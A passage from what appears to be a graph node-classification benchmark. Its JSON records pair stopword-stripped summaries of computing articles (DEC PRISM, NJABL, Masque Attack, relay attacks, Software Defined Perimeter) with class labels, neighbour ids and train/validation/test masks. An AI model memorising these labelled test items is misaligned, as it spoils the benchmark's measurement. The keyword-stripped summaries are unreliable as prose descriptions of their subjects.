    "text": "DEC_Prism:dec prism prism parallel reduced instruction set machine 32-bit risc instruction set architecture isa developed digital equipment corporation dec final outcome number dec research projects 1982–85 time-frame point delivering silicon 1988 management canceled project next year work alpha started based heavily prism design period 1982 1985 fewer four attempts made create risc chip different dec divisions titan dec western research laboratory wrl palo alto california high-performance ecl based design started 1982 intended run unix safe streamlined architecture fast execution 64-bit design started year designed alan kotok spacewar fame dave orbits intended run vms hr-32 hudson risc 32-bit started 1984 rich witek dan dobberpuhl hudson fab intended used co-processor vax machine year dave cutler started cascade project decwest bellevue washington eventually cutler asked define single risc project 1985 selecting rich witek chief architect design started 64-bit chip later downsized 32-bits august 1985 first draft high-level design delivered work began detailed design prism specification developed period many months five-person team dave cutler dave orbits rich witek dileep bhandarkar wayne cardoza work 98 done 1985–86 heavily supported simulations pete benoit large vaxcluster terms integer operations prism architecture similar mips designs 32-bits instructions 6 highest 5 lowest bits instruction leaving 21 bits word encoding either constant register locations sixty-four 32-bit registers included opposed thirty-two mips usage otherwise similar prism mips lack register windows hallmark major risc design berkeley risc/sparc prism design notable several aspects instruction set notably prism included epicode extended processor instruction code defined number special instructions intended offer operating system stable abi across multiple implementations epicode given set 22 32-bit registers use set vector processing instructions later added well supported additional sixteen 64-bit vector registers could used variety ways two versions system planned decwest worked high-end ecl implementation known crystal semiconductor advanced development team worked microprism cmos version microprism finished first sent test fabrication april 1988 additionally cutler led development new microkernel-based operating system code-named mica offer unix-like vms-like personalities top common substrate services throughout prism period dec involved major debate future direction company newer workstations introduced performance benefit vax constantly eroded price/performance ratio completely undermined different groups within company debated best respond advocated moving vax high-end abandoning low-end workstations others suggested moving workstation market using commodity processor still others suggested re-implementing vax risc processor led considerable problems turf wars various groups competition divisions delayed architecture review n't closed 1986 work associated support chips memory management unit floating point unit later interrupted yet another debate whether design 32- 64-bit microprism design finalized april 1988 frustrated growing number losses cheaper faster competitive machines independently small group outside central engineering focused workstations unix/ultrix entertained idea using off-the-shelf risc processor build new family workstations group carried due diligence eventually choosing mips r2000 group acquired development machine prototyped port ultrix system initial meetings mips prototype machine took 90 days full production able start january 1989 resulting decstation 3100 family meeting reviewing various projects july 1988 company decided cancel prism continue mips workstations high-end vax products dave cutler left company soon every attempt produce faster vax could compete newer workstations eventually failed vax 9000 ran delays time shipped newer unix workstations already surpassed performance tiny fraction cost size apparently aware danger meeting prism canceled ken olsen started new project continue exploring risc-based vax indirectly led formation alpha project next year",
    "neighbors": [
      7173,
      9739,
      2066,
      7187,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      4144,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      7770,
      3175,
      8815,
      6268,
      3197,
      639,
      7313,
      9371,
      8861,
      6815,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      6846,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      5873,
      8944,
      2805,
      249,
      8700,
      8450,
      1798,
      1801,
      6926,
      6415,
      8976,
      1298,
      11539,
      2339,
      6950,
      3886,
      7983,
      10548,
      309,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      11604,
      344,
      10590,
      1376,
      10603,
      8048,
      4465,
      5492,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      3493,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      10680,
      4030,
      6084,
      453,
      3014,
      4553,
      6607,
      466,
      2517,
      1499,
      7134,
      5090,
      995,
      7653,
      10733,
      10734,
      6639,
      499,
      4596,
      2039,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 758,
    "label": 8,
    "text": "Web_Services_Test_Forum:web services test forum web services test forum wstf provides framework members web service community develop interoperability scenarios test implementations scenarios implementations wstf charge dues central governing authority i.e board wstf patterned initial creators bea systems fujitsu ibm oracle soapbuilders mailing list/community main focus test various web service specifications also serves forum entire web service community share ideas concerns open fashion wstf founded following basic principles unlike interoperability organizations work wstf center around individual specifications activities organized around concept test scenario scenarios made three parts scenario defined members wstf may implement using products open source projects deploy implementations onto publicly available systems test interoperability crosswise fashion problems issues discussed wstf mailing lists scenario may need clarified re-factored process implementation reaches certain level maturity implementers choose scenario implementations made visible outside wstf publishing whether published endpoints provide scenario implementations expected maintained indefinitely allows members wstf perform regression testing test new implementations verify behavior etc without requiring active participation implementer wstf chose keep work private couple reasons first entirely public forum members may feel free bring sensitive topics signing participation agreement members agree keep discussions private group thus allowing much open honest discussion second members wstf wanted wstf published scenario mean broad community support without formal publish step process would hard distinguish scenarios community support versus ones implemented one company scenario published 5 different implementations least two third implementor choose make public members wstf put implementations/endpoints scenario eligible vote restriction done ensure skin game allowed influence information process see wstf charter functional non-functional web service testing done help wsdl parsing regression testing performed identifying changes made thereafter web service regression testing needs categories three different ways namely changes wsdl changes code selective re-testing web service operations capture three changes three intermediate forms wsdl namely difference wsdl dwsdl unit wsdl uwsdl reduced wsdl rwsdl respectively used intermediate forms wsdls combined form combined wsdl cwsdl used regression testing web service help automatic web service change management awscm performing selection relevant test cases construct reduced test suite old test suite wstf produces following artifacts",
    "neighbors": [
      9137,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 759,
    "label": 9,
    "text": "Level_I_BASIC:level basic level basic dialect basic programming language shipped first trs-80 trs-80 model original prototype trs-80 model ran li-chen wang public domain version tiny basic demonstration executives tandy corporation president charles tandy tried enter salary tiny basic used 2-byte signed integers ranging 32,767 n't able result request floating-point math production version besides adding single-precision floating-point math tandy-employee steve leininger extended language support input/output routines keyboard crt reading writing cassettes language fit within 4 kb rom presentation announcing trs-80 leininger said went back wang basic completely tore 60 per cent integer overhead kind stuff trs-80 introduced three versions basic announced level language available trs-80 model ii briefly re-surfaced baseline package trs-80 model iii 1981 selling 699 compared 999 system model iii basic another microsoft product language identical model version addition commands output printer level basic supported following keywords like palo alto tiny basic based level basic tokenize keywords like microsoft basic used abbreviations reduce amount memory used keywords codice_29 codice_30 codice_31 codice_11 codice_33 codice_5 codice_35 codice_36 language supported 26 single-precision variables z two strings b one pre-defined array language lacked dim statement dimensioning array size determined available memory used program listing 4 bytes per item language lacked many common math functions manual provided subroutine listings square root exponentiation exponentials logarithms arithmetic sign trigonometry functions",
    "neighbors": [
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 760,
    "label": 3,
    "text": "R6000:r6000 r6000 microprocessor chip set developed mips computer systems implemented mips ii instruction set architecture isa chip set consisted r6000 microprocessor r6010 floating-point unit r6020 system bus controller r6000 first implementation mips ii isa r6000 implemented emitter-coupled logic ecl mid- late 1980s trend implement high-end microprocessors high-speed logic ecl mips fabless company r6000 chip set fabricated bipolar integrated technology r6000 users control data systems cds used 80 mhz version high-end 4680-300 series inforserver server mips used r6000 rc6260 rc6280 servers",
    "neighbors": [
      4098,
      8327,
      8711,
      783,
      7445,
      9851,
      4124,
      8481,
      5028,
      6057,
      938,
      426,
      8237,
      7234,
      1480,
      10316,
      6247,
      6250,
      6252,
      6253,
      5358,
      10734,
      6256,
      5237,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 761,
    "label": 4,
    "text": "Not_Just_Another_Bogus_List:another bogus list another bogus list njabl dns blacklist njabl maintained list known potential spam sources open mail relays open proxies open form mail http gateways dynamic ip pools direct spammers purpose able tag refuse e-mail thereby block spam certain sources njabl automatically retests listed open relays every 90 days open proxy ips portion njabl data used spamhaus xbl list njabl dynamic ip list originally came dynablock maintained independently since dynablock stopped updating december 2003 sorbs dynamic ip list also development dynablock aggressively inclusive njabl version march 1 2013 njabl process shut dnsbl zones emptied internet time remove njabl server configs ns pointed unallocated space 192.0.2.0/24 test-net-1 hopefully make shutdown obvious slower notice april 29 above-mentioned pointing dnsbl ns 192.0.2.0/24 done jan 02/2019 domain name njabl.org set expire dns servers switched tucows autorenew servers would cause lookups servers still removed configuration rejections",
    "neighbors": [
      8224,
      5591
    ],
    "mask": "None"
  },
  {
    "node_id": 762,
    "label": 8,
    "text": "DNSimple:dnsimple dnsimple managed domain name server service operated aetrion llc d/b/a dnsimple offers dns hosting domain registration ssl certificates dnsimple also icann-accredited domain registrar dnsimple founded 2010 anthony eden darrin eden first public version service launched july 2010 offered managed dns domain registration added later september 2010 partnership enom november 2011 dnsimple announced new proprietary dns record type called alias provides cname-like dns record apex domain september 2012 dnsimple acquired robodomain inc. provided domain management service robodomain whois software service robowhois simone carletti robodomain inc. founder joined dnsimple first official full-time employee dnsimple robodomain discontinued end 2013 december 2013 dnsimple migrated customers unicast new anycast network composed 5 points presence december 2014 dnsimple fell victim major distributed denial-of-service ddos attack across entire network resulted several hours downtime part mitigation plans company decided review implementation secondary dns support released begin 2015 dnsimple us company however company completely decentralized team members work remotely actively promote telecommuting company dns service actively used one let encrypt dns challenge validation seen download numbers docker hub",
    "neighbors": [
      8204,
      467,
      2003,
      11221,
      1435,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 763,
    "label": 2,
    "text": "Masque_Attack:masque attack masque attack name ios vulnerability identified named computer security company fireeye july 2014 fireeye privately informed apple inc. issue july 26 2014 disclosed vulnerability public november 10 2014 blog post website vulnerability identified exist ios 7.1.1 7.1.2 8.0 8.1 8.1.1 beta jailbroken non-jailbroken ios devices vulnerability consists getting users download install apps deceptively created bundle identifier existing legitimate app deceptive app replace pose legitimate app long app one pre-installed along ios i.e. default apple apps – thus reason fireeye gave naming vulnerability masque attack november 13 2014 united states computer emergency readiness team us-cert part department homeland security released alert bulletin ta14-317a regarding masque attack apple stated november 14 aware incidents one customers affected attack",
    "neighbors": [
      4081,
      5563,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 764,
    "label": 9,
    "text": "Solidity:solidity solidity object-oriented programming language writing smart contracts used implementing smart contracts various blockchain platforms notably ethereum developed gavin wood christian reitwiessner alex beregszaszi liana husikyan yoichi hirai several former ethereum core contributors enable writing smart contracts blockchain platforms ethereum solidity initially proposed august 2014 gavin wood language later developed ethereum project solidity team led christian reitwiessner present solidity primary language ethereum well private blockchains running platforms compete ethereum monax hyperledger burrow blockchain uses tendermint consensus swift deployed proof concept using solidity running burrow cornell university researcher stated solidity partially blame dao hack took place 2016 stated actually flaw exploit dao contract technically ethereum virtual machine evm operating intended solidity introducing security flaws contracts missed community missed designers language solidity statically-typed programming language designed developing smart contracts run evm solidity compiled bytecode executable evm solidity developers able write applications implement self-enforcing business logic embodied smart contracts leaving non-repudiable authoritative record transactions writing smart contracts smart contract specific languages solidity referred easy ostensibly already programming skills specified wood designed around ecmascript syntax make familiar existing web developers unlike ecmascript static typing variadic return types compared evm-targeting languages time serpent mutan solidity contained number important differences complex member variables contracts including arbitrarily hierarchical mappings structs supported contracts support inheritance including multiple inheritance c3 linearization application binary interface abi facilitating multiple type-safe functions within single contract also introduced later supported serpent documentation system specifying user-centric description ramifications method-call also included proposal known natural language specification example solidity program contract gavcoin solidity available",
    "neighbors": [
      9248,
      3713,
      9921,
      9859,
      3462,
      8554,
      1935,
      7248,
      5330,
      1908,
      8916,
      8854,
      4827,
      11612,
      1087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 765,
    "label": 3,
    "text": "Pcmicro:pcmicro pcmicro large bulletin board system bbs support site 1981 1998 world wide web became popular pcmicro bbs served central file repository non-commercial bbs software related utilities bbs fidonet member 1991-1997 support distribution site several shareware freeware bbs packages including remoteaccess proboard elebbs pcmicro later released telnet communications driver named netfoss allows dos-based bbs software used telnet bbs longer service today entire collection freeware shareware bbs software utilities found bbs archives http //archives.thebbs.org containing thousands third party add-ons bbs packages",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 766,
    "label": 4,
    "text": "Paul_M._Nakasone:paul m. nakasone paul miki nakasone born november 19 1963 four-star general united states army currently serves commander united states cyber command concurrently serves director national security agency chief central security service previously commander united states army cyber command nakasone took command united states second army cyber command october 2016 second army inactivation march 2017 may 2018 became head national security agency central security service united states cyber command nakasone born st. paul minnesota son edwin m. nakasone retired army colonel served military intelligence service world war ii mary anne nakasone née costello nakasone father second-generation japanese american nakasone grew white bear lake minnesota attended white bear high school married four children nakasone attended st. john university received commission graduation 1986 reserve officer training program nakasone also attended university southern california national defense intelligence college united states army war college holding master degrees also graduate united states army command general staff college nakasone held commands company battalion brigade levels also held foreign postings iraq afghanistan korea served senior intelligence officer battalion division corps levels nakasone served joint chiefs staff deputy director trans-regional policy 2012 promoted brigadier general previously served staff officer general keith b. alexander prior promoted lieutenant general 2016 nakasone deputy commanding general united states cyber command later commander cyber national mission force cyber command nakasone twice served staff officer joint chiefs staff director intelligence j2 international security assistance force afghanistan october 14 2016 took command united states second army united states army cyber command nakasone also given control united states cyber command joint task force-ares task-force designed coordinate electronic counter-terrorist activities islamic state served commander second army inactivated fourth time history march 31 2017 remains commander united states army cyber command january 2018 reported nakasone list potential replacements outgoing nsa director michael s. rogers february 2018 nominated promotion general april 2018 nakasone unanimously confirmed united states senate director national security agency head cyber command also promoted general",
    "neighbors": [
      6017,
      7137,
      1189,
      6343,
      11335,
      3305,
      7145,
      9517,
      1838,
      7759,
      7887,
      3154,
      2419,
      8276,
      6005,
      6136,
      5308,
      991
    ],
    "mask": "None"
  },
  {
    "node_id": 767,
    "label": 4,
    "text": "Relay_attack:relay attack relay attack computer security type hacking technique related man-in-the-middle replay attacks classic man-in-the-middle attack attacker intercepts manipulates communications two parties initiated one parties classic relay attack communication parties initiated attacker merely relays messages two parties without manipulating even necessarily reading peggy works high security building accesses using smart card purse approaches door building building detects presence smart card initiates exchange messages constitute zero-knowledge password proof card peggy building allows peggy enter mallory wants break building mallory approaches building device simulates smart card building responds initiating exchange messages mallory forwards message accomplice evelyn tailing peggy runs errands another part town evelyn relays message peggy smart card listens answer forwards answer mallory relays building continuing way mallory evelyn relay messages building peggy smart card building satisfied communicating peggy smart card building opens mallory enters",
    "neighbors": [
      8694,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 768,
    "label": 3,
    "text": "Circus_Charlie:circus charlie game six regular stages plus extra stage differing tasks completed charlie grabbing money bags performing dangerous tricks avoiding enemies completing stages etc. earns charlie points sixth stage completed game starts faster pace difficult exactly terms task completed levels charlie also races time bonus points awarded according time remaining running time cost player life standard arcade version 6 levels total levels 1 2 4 5 5 sublevels level 3 contains 7 sublevels sublevel gets difficult level 6 also 5 sublevels repeats long user lives level select version game player choose stages play limited number times whereupon level become unselectable ending game—after first five levels played limit player repeats trapeze stage lives exhausted famicom version trampoline stage omitted b mode levels repeated added difficulty game often shows famicom clone systems multicarts usually title screen altered remove copyright versions also levels split make separate games multicarts music comes american patrol blue danube mikie another konami arcade game headbutting teacher desk three times classroom stage make circus charlie appear giving player extra points circus charlie released along konami classic games nintendo ds compilation",
    "neighbors": [
      8601,
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 769,
    "label": 8,
    "text": "WebMethods_Glue:webmethods glue webmethods glue enterprise web services platform webmethods provides web services/soap capabilities existing java c/c++ applications developers use java-based product add enterprise web services integration legacy applications reduced programming effort embeddable product small footprint turns non-web service application one exposes functionality web services similar open source apache axis glue product provides layer web service interoperability existing applications webmethods glue features include created mind electric glue—as named—was company flagship product released two forms free unsupported standard version company-supported commercially licensed professional edition september 2003 glue featured microsoft press book microsoft .net j2ee interoperability toolkit webmethods acquired product part merger mind electric merger resulted rebranding product webmethods prefix become webmethods glue webmethods glue product 6.5.x maintenance ended may 31 2010 support ended year later http servlets xml soap wsdl uddi",
    "neighbors": [
      10020,
      5677,
      2045,
      10486,
      7261
    ],
    "mask": "Test"
  },
  {
    "node_id": 770,
    "label": 3,
    "text": "Legacy_of_the_Wizard:legacy wizard legacy wizard originally released japan fantasy-themed action role-playing platform game released msx msx2 famicom japan nintendo entertainment system united states legacy wizard installment falcom dragon slayer series one five dragon slayer games localized outside japan game early example open-world non-linear action rpg combining action-rpg gameplay would later called metroidvania -style action-adventure elements game chronicles story drasle family abbreviation dragon slayer localized worzen family usa attempt destroy ancient dragon named keela magically entrapped painting within underground labyrinth accomplish goal must find dragon slayer magical sword protected four hidden crowns player must use unique abilities member family regain possession crowns destroy evil keela like many games era story legacy wizard explained almost entirely game instruction manual game contains little text little add even explain story game drasle family consists six members three generations plus family pet resembles small dinosaur player takes control members drasles pet sending one time vast underground cavern filled traps puzzles monsters search four crowns periodically returning family household surface change characters obtain password member family consists father mother son daughter pet different strengths weaknesses contribute goal characters seemingly powerful strengths offset proportionate limitations example father strongest attack power jump high rest family mother family relatively weak attributes one use specific magical items required find one crowns discovering utilizing character strengths player travels extensive dungeon eventually fighting four bosses gain crowns game vast labyrinth five major sections four contain boss guards one crowns fifth contains final boss section noticeably different characteristics different background music designed one particular playable character mind crowns acquired without player utilizing family members specific skills get sections dungeon therefore playable character must used point order complete game example one section may blocked bricks destroyed mattock player must use character use mattock get area four crowns acquired family young boy use magic crowns find dragon slayer use magical sword slay evil keela player encounter endless supply monsters running convoluted passageways character fire shots varying strength defeat monsters attacking uses character magic power monsters drop items defeated keys used open locked doors treasure chests bread restores player health potions restore magic power sometimes poison harms player money also collected defeated monsters spent shops inns located throughout dungeon characters legacy wizard must utilize several magical items quest acquired chests bought shops sometimes located impractical locations item effects include restoring character health magic power boosting attack power range environmental effects like enabling character fly move special bricks items used certain characters since accomplishing goals requires use items player determine character must used regain crown acquiring items finding properly use essence legacy wizard dragon slayer iv drasle family released msx2 home computer july 10 1987 ported famicom nihon falcom released july 17 1987 conversion often misattributed quintet due reference company name game ending credits composer yuzo koshiro confirmed pure coincidence since company n't formed two years later 2008 game released mobile phones japan 1up.com called hidden gem nes",
    "neighbors": [
      3113,
      10217,
      9006,
      10931,
      11443,
      9658,
      1596
    ],
    "mask": "Test"
  },
  {
    "node_id": 771,
    "label": 5,
    "text": "RFB_protocol:rfb protocol rfb “ remote framebuffer ” open simple protocol remote access graphical user interfaces works framebuffer level applicable windowing systems applications including microsoft windows macos x window system rfb protocol used virtual network computing vnc derivatives default viewer/client uses tcp port 5900 connect server 5800 browser access also set use port alternatively server connect viewer listening mode default port 5500 one advantage listening mode server site configure firewall/nat allow access specified ports burden viewer useful server site computer expertise viewer user would expected knowledgeable although rfb started relatively simple protocol enhanced additional features file transfers sophisticated compression security techniques developed maintain seamless cross-compatibility many different vnc client server implementations clients servers negotiate connection using best rfb version appropriate compression security options support rfb originally developed olivetti research laboratory orl remote display technology used simple thin client atm connectivity called videotile order keep device simple possible rfb developed used preference existing remote display technologies rfb found second enduring use vnc developed vnc released open source software rfb specification published web since rfb free protocol anybody use orl closed 2002 key people behind vnc rfb formed realvnc ltd. order continue development vnc maintain rfb protocol current rfb protocol published realvnc website published versions rfb protocol follows developers free add additional encoding security types must book unique identification numbers maintainers protocol numbers clash clashing type numbers would cause confusion handshaking connection break cross-compatibility implementations list encoding security types maintained realvnc ltd separate protocol specification new types added without requiring specification reissued community version rfb protocol specification aims document existing extensions hosted tigervnc project terms transferring clipboard data currently way transfer text outside latin-1 character set vnc protocol pixel based although leads great flexibility i.e type desktop displayed often less efficient solutions better understanding underlying graphic layout like x11 desktop rdp protocols send graphic primitives high level commands simpler form e.g open window whereas rfb sends raw pixel data albeit compressed vnc protocol expresses mouse button state single byte binary up/down limits number mouse buttons eight effectively 7 given convention button 0 meaning “ disabled ” many modern mice enumerate 9 buttons leading forward/back buttons effect rfb",
    "neighbors": [
      6797,
      6993,
      7857,
      4729,
      10747
    ],
    "mask": "Test"
  },
  {
    "node_id": 772,
    "label": 7,
    "text": "Social_BI:social bi social bi social business intelligence refers creation publishing sharing custom business analytics reports dashboards end users cloud technologies social collaborative bi use enterprise 2.0 tools practices business intelligence outputs purpose making collective decisions first enabled rapid growth social media networks 2009 social bi allows collaborative development post user-generated analytics among business analysts data mining professionals removed previous barriers self-service bi still employing traditional analytics applications social bi also interpreted providing business intelligence based social networks data example company selling consumer electronics goods needs know people responding latest advertisements promotions reports visualizations made using social media represent people talking real time pulling data different social media preparing understandable reports help company decide upon steps dashboards visualizations reports based social media help companies get efficient feedback act accordingly september 13 2011 dachis group introduced social business index provide insights ‘ social ’ companies stack similar corporations respective industries competitors provide ‘ social business ’ benchmarks company subsidiary geography department brand",
    "neighbors": [
      4194,
      5525
    ],
    "mask": "None"
  },
  {
    "node_id": 773,
    "label": 0,
    "text": "Sinewave_synthesis:sinewave synthesis sinewave synthesis sine wave speech technique synthesizing speech replacing formants main bands energy pure tone whistles first sinewave synthesis program sws automatic creation stimuli perceptual experiments developed philip rubin haskins laboratories 1970s program subsequently used robert remez philip rubin david pisoni colleagues show listeners perceive continuous speech without traditional speech cues i.e. pitch stress intonation work paved way view speech dynamic pattern trajectories articulatory-acoustic space",
    "neighbors": [
      3533
    ],
    "mask": "None"
  },
  {
    "node_id": 774,
    "label": 4,
    "text": "Software_Defined_Perimeter:software defined perimeter software defined perimeter sdp also called black cloud approach computer security evolved work done defense information systems agency disa global information grid gig black core network initiative around 2007 connectivity software defined perimeter based need-to-know model device posture identity verified access application infrastructure granted application infrastructure effectively “ black ” dod term meaning infrastructure detected without visible dns information ip addresses inventors systems claim software defined perimeter mitigates common network-based attacks including server scanning denial service sql injection operating system application vulnerability exploits man-in-the-middle cross-site scripting xss cross-site request forgery csrf pass-the-hash pass-the-ticket attacks unauthorized users open source implementation done paid homeland security premise traditional enterprise network architecture create internal network separated outside world fixed perimeter consists series firewall functions block external users coming allows internal users get traditional fixed perimeters help protect internal services external threats via simple techniques blocking visibility accessibility outside perimeter internal applications infrastructure weaknesses traditional fixed perimeter model becoming ever problematic popularity user-managed devices phishing attacks providing untrusted access inside perimeter saas iaas extending perimeter internet software defined perimeters address issues giving application owners ability deploy perimeters retain traditional model value invisibility inaccessibility outsiders deployed anywhere – internet cloud hosting center private corporate network across locations simplest form architecture sdp consists two components sdp hosts sdp controllers 6 sdp hosts either initiate connections accept connections actions managed interactions sdp controllers via control channel see figure 1 thus software defined perimeter control plane separated data plane enable greater scalability addition components redundant higher availability sdp framework following workflow see figure 2 general workflow remains implementations application sdps favor certain implementations others client-to-gateway implementation one servers protected behind accepting sdp host accepting sdp host acts gateway clients protected servers implementation used inside enterprise network mitigate common lateral movement attacks server scanning os application vulnerability exploits password cracking man-in-the-middle pass-the-hash pth others alternatively implemented internet isolate protected servers unauthorized users mitigate attacks denial service sql injection os application vulnerability exploits password cracking man-in-the-middle cross-site scripting xss cross-site request forgery csrf others client-to-server implementation similar features benefits client-to-gateway implementation discussed however case server protected running accepting sdp host software instead gateway sitting front server running software choice client-to-gateway implementation client-to-server implementation typically based number servers protected load balancing methodology elasticity servers similar topological factors 13 server-to-server implementation servers offering representational state transfer rest service simple object access protocol soap service remote procedure call rpc kind application programming interface api internet protected unauthorized hosts network example case server initiating rest call would initiating sdp host server offering rest service would accepting sdp host implementing sdp use case reduce load services mitigate attacks similar ones mitigated client-to-gateway implementation client-to-server-to-client implementation results peer-to-peer relationship two clients used applications ip telephone chat video conferencing cases sdp obfuscates ip addresses connecting clients minor variation user also client-to-gateway-to-client configuration user wishes hide application server well data breaches involve intellectual property financial information hr data sets data available within enterprise network attackers may gain entrance internal network compromising one computers network move laterally get access high value information asset case enterprise deploy sdp inside data center partition network isolate high-value applications unauthorized users network access protected application thus mitigating lateral movement attacks depend useful protecting physical machines software overlay nature sdp also allows integrated private clouds leverage flexibility elasticity environments role sdps used enterprises hide secure public cloud instances isolation unified system includes private public cloud instances and/or cross-cloud clusters software-as-a-service saas vendors use sdp protect services implementation software service would accepting sdp host users desiring connectivity service would initiating hosts allows saas leverage global reach internet without enabling internet global attack surface infrastructure-as-a-service iaas vendors offer sdp-as-a-service protected on-ramp customers allows customers take advantage agility cost savings iaas mitigating wide range potential attacks platform-as-a-service paas vendors differentiate offering including sdp architecture part service gives end users embedded security service mitigates network-based attacks vast amount new devices connected internet back-end applications manage devices and/or extract information devices mission-critical act custodian private sensitive data sdps used hide servers interactions internet provide improved security up-time",
    "neighbors": [
      899,
      997,
      2470,
      4198,
      4552,
      3742,
      3473,
      7031,
      7388,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 775,
    "label": 7,
    "text": "ClearTrial:cleartrial cleartrial multinational software developer headquartered chicago illinois usa company develops markets software service saas system designed biopharmaceutical medical device manufacturers planning outsourcing tracking clinical trials cleartrial software architecture follows project management methodology includes activity-based costing predicts level effort specific resource person perform given task activity level effort calculated based algorithm derived analysis cost time drivers affect task cleartrial work breakdown structure defines groups tasks subtasks comprise clinical trial way organizes defines total work scope clinical project cleartrial ’ clinical trial subject matter experts smes published peer-reviewed articles functional service provider outsourcing clinical trials adaptive clinical trials clinical trials medical devices well articles clinical trial trends april 2011 cleartrial named one five “ cool vendors life sciences ” research firm gartner march 29 2012 oracle corporation announced agreed acquire cleartrial transaction closed",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 776,
    "label": 3,
    "text": "Alabama_Regional_Communications_System:alabama regional communications system alabama regional communications system arcs radio/alert notification communications district responsibility providing user-based administration operations maintenance interoperable communications system serves calhoun county alabama talladega county alabama motorola trunked radio system licensed federal communications commission fcc operate radio frequency spectrum 800 megahertz mhz public safety band calhoun-talladega 800 mhz communications system originally developed installed enhance interoperability provide alert notification community destruction chemical weapons anniston army depot anad communications system funded maintained federal grant known chemical stockpile emergency preparedness program csepp joint united states army federal emergency management agency fema program designed provide community education emergency preparedness resources event chemical agent emergency original communications system legacy system analog trunking went on-the-air 1998 quickly became primary means two-way communications public safety agencies calhoun talladega counties replacing standalone conventional radio repeaters 2006 csepp communications system upgraded digital project 25 motorola type ii smartzone version 7.4 linear simulcast/multicast trunked 800 mhz communications system facilities anad known anniston chemical activity anca stored approximately seven percent nation chemical weapon stockpile including vx nerve agent sarin gb agent anad one nine united states army installations united states stored chemical weapons united states army began incinerating stored weapons august 9 2003 destruction anad chemical weapons stockpile controversial part potential danger surrounding community incident occur weapons disposal operations september 2011 us army chemical materials agency cma successfully completed safe elimination anad ’ chemical weapons stockpile result completion chemical warfare disposal operations anad federal funding communities surrounding anniston army depot end march 31 2012 includes funding operations maintenance csepp communications system years community become increasingly dependent upon capabilities communications system particular reliability interoperability capacity in-building coverage provides 24-7-365 voice data communications services nearly 3,000 users including law enforcement fire rescue emergency medical services school facilities buses hospitals transportation utilities many agencies also provides activation signaling almost 200 outdoor warning sirens located throughout counties time chemical weapons disposal completed system serving nearly 100 percent mission-critical communications needs calhoun talladega county preparation end csepp grant funding local officials explored alternative strategies generate funds would allow continued service operation existing communications system support cooperation local state elected officials fema consulting firms users system exploratory committee crafted legislation would allow users take ownership system june 15 2011 alabama governor robert j. bentley signed house bill 389 law act 2011-675 create radio/alert notification communications district purpose legislation create mechanism community transition csepp communications system federal grant funding locally generated funding operations ownership provided new alabama law codified sections 11-31-1 11-31-4 code alabama 1975 amended calhoun talladega county commissions made respective appointments communications district board directors term appointment listed parenthesis duly appointed board directors convened first time september 1 2011 first day appointment terms members present motion passed unanimously officially name communications district alabama regional communications system arcs board directors meetings open public regularly scheduled monthly meetings held second tuesday every month oxford alabama police department municipal court 600 stanley merrill drive oxford alabama 36203 april 1 2012 arcs become fully responsible administration operation 800 mhz system assets estimated value approximately 100 million dollars time cost operating system 100 percent funded revenue collected user fees based current predicted costs operate maintain system arcs board directors determined monthly user fee 22.50 per two-way radio device mobile portable modem siren control 50.00 per dispatch console rate applies local users calhoun talladega county formula determining user fee based total estimated annual costs operate communications system compared projected total number users subscribing system current user fees established based approximately 2,800 users projected annual cost approximately 760,000 operate maintain system",
    "neighbors": [
      2948,
      9373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 777,
    "label": 5,
    "text": "Gigabit_Video_Interface:gigabit video interface gigabit video interface gvif digital video serial interface developed sony 1996 high quality uncompressed video transmission digital video hardware intended primarily automotive applications compatible hdcp encryption system gvif transmits uncompressed serial data speeds 1.95 gbit/s gvif transmits single differential pair result cable thin transmission distances ten meters possible gvif bus used circa 2000 onwards many mid range vehicles including land rover discovery 3 range rover lexus models toyota prius gvif bus primarily carrying video signal integrated satellite navigation unit vehicle display also known head unit gvif bus vehicles carried video despite specification allowing data stuffing information",
    "neighbors": [
      3629
    ],
    "mask": "Test"
  },
  {
    "node_id": 778,
    "label": 4,
    "text": "WindowsSCOPE:windowsscope windowsscope memory forensics reverse engineering product windows used acquiring analyzing volatile memory one uses detection reverse engineering rootkits malware windowsscope supports acquisition analysis windows computers running windows xp windows 10 windowsscope supports software-based acquisition well hardware-assisted methods locked unlocked computers windowsscope add-on hardware memory acquisition uses pci express bus direct access system memory memory snapshots acquired windowsscope stored repository memory snapshots repository compared track changes system time windowsscope shows processes dlls drivers running computer time memory snapshot well open network sockets file handles registry key handles also provides disassembly control flow graphing executable code windowsscope live version tool allows analysis performed mobile device",
    "neighbors": [
      5284,
      4423,
      9319,
      6797,
      4589,
      3854,
      10173,
      7515,
      6813,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 779,
    "label": 2,
